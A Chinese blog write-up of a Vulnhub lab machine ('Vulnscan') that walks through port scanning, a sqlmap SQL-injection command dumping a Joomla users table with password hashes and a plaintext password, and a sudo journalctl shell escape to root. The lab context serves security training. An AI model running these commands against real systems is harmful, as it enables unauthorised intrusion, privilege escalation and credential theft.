Vulnhub系列--Vulnscan

image

tragte IP: 192.168.139.136

信息收集

nmap -A 192.168.139.136

image

开放5个服务,分别为:

  • 22: ssh
  • 5000: wordpress
  • 80: http
  • 8081: joomla
  • 9001: Drupal

逐个分析漏洞

wordpress

发现存在一个命令执行:

http://fsociety.web:5000/admin-wp/

image

依据时间发现存在用户名和密码,可以直接登录,反弹shell一直失败

image

登录后可以得到:

image

image

journalctl不需要密码直接root执行,利用方式:https://gtfobins.github.io/gtfobins/journalctl/

使用方式:

sudo /bin/journalctl
!/bin/bash

image

image

image

joomla

image

发现存在sql注入,直接注入可得用户名和密码:

sqlmap -u "http://192.168.139.136:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" -D joomla_db -T hs23w_users  --dump

image

usernamepasswordemail
joomlaCMS_admin$2y$10$EYc6SKfMLzlLE/IcD9a6XeAe2Uv7WTBFlbbqRrnpht1K0M1bLrWeeFluntence54@armyspy.com
elliot$2y$10$jddnEQpjriJX9jPxh6C/hOag4ZZXae4iVhL7GVRPC9SHWgqbi4SYy5T3e!_M0un7i@N

可以看到elliot的邮箱就是密码,可以直接登录:

image

Drupal

image

版本为7.54,搜索exploit:

image

image

image

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值